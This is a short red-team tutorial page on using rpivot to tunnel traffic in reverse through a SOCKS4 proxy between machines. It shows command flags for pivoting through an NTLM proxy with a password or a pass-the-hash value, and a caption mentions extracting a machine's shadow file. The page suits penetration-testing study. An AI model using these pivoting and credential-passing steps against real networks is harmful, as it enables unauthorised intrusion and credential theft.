Johnermac
  • About me
  • Active Directory
    • PowerShell
      • Customize
      • Notes
      • ETW
      • AMSI Bypass
      • Obfuscation
    • Enumeration
      • Domain
      • GPO
      • ACL
      • Domain Trusts
      • Forest
      • Extra
      • BloodHound
      • BloodHound CE
  • Tunneling
    • Tools
      • Udp2Raw
      • Fraud Bridge
      • Chisel
      • SSF
      • Egress-Assess
      • Ligolo-ng
      • Sshutle
      • Rpivot
      • Tunna
      • reGeorg
      • Neo-reGeorg
      • PivotSuite
  • Post-Exploitation
    • Data Exfiltration
      • HTTP
        • Cancel
        • wget
        • bash
        • busybox
        • IRB
        • PHP
        • Ruby
      • ICMP
        • XXD
        • Ruby
        • Python
      • UDP
        • Netcat
      • TCP
        • Netcat
        • KSH
        • whois
        • Finger
      • HTTPS
        • Python
        • OpenSSL
  • BLOG
    • Articles
      • Pivoting for Red Teaming
Powered by GitBook
On this page
  • Requirements
  • When to use rpivot?
  • We can also PIVOT through a NTLM Proxy
  1. Tunneling
  2. Tools

Rpivot

RPIVOT allows to tunnel traffic into internal network via socks 4. It works like ssh dynamic port forwarding but in the opposite direction.

PreviousSshutleNextTunna

Last updated 1 year ago

Source: https://github.com/klsecservices/rpivot

Requirements

  • Python 2.6/2.7

  • Add this line to the /etc/proxychains.conf file:

    • socks4 127.0.0.1 1080

When to use rpivot?

Imagine this scenario:

  • A machine can connect to B

  • B machine can connect to C

  • C can't connect directly to A

  • So, in this case, we can use rpivot from C to B proxying the access

  • After that, we can access A directly from C

In Wireshark we can see that all the communication happened through port 4444 that we set up with rpivot

We can also PIVOT through a NTLM Proxy

In this case, we add in the client side these flags:


--ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain DOMAIN.COM --username John --password password

Or using pass the hash:


--ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain DOMAIN.COM --username John --hashes <hash>
Diagram
Open the server - Machine C
Connect the client to the server - Machine B
3rd one - Machine A
Extracting the Shadow of the 3rd machine
Wireshark Results